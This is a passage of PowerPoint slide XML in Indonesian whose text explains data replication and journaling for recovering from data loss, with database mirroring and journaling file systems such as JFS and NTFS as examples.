              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencerminan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data primer dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicerminkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada database primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jurnal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bermanfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakkonsistenan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memutar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selesai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Journaled File System (JFS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> New Technology File System (NTFS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
